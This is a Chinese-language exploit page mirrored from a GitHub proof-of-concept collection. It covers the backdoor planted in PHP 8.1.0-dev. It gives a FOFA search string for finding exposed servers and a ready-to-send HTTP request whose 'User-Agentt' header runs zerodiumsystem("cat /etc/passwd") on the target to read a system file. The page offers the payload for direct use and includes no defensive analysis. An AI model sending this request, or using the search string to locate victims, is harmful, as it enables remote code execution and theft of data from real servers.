mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-29 09:40:31 +00:00
30 lines
1.0 KiB
Markdown
30 lines
1.0 KiB
Markdown
![]() |
# PHP-8.1.0-dev zerodium后门命令执行漏洞
|
|||
|
|
|||
|
# 一、漏洞简介
|
|||
|
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送`User-Agentt`头来执行任意代码。
|
|||
|
|
|||
|
# 二、影响版本
|
|||
|
+ PHP/8.1.0-dev
|
|||
|
|
|||
|
# 三、资产测绘
|
|||
|
+ fofa`"PHP/8.1.0-dev"`
|
|||
|
+ 特征
|
|||
|
|
|||
|

|
|||
|
|
|||
|
# 四、漏洞复现
|
|||
|
```plain
|
|||
|
GET / HTTP/1.1
|
|||
|
Host: xx.xx.xx.xx
|
|||
|
User-Agentt: zerodiumsystem("cat /etc/passwd");
|
|||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|||
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|||
|
Accept-Encoding: gzip, deflate, br
|
|||
|
```
|
|||
|
|
|||
|

|
|||
|
|
|||
|
|
|||
|
|
|||
|
> 更新: 2024-09-05 23:27:24
|
|||
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wr81rdntsr6nz25n>
|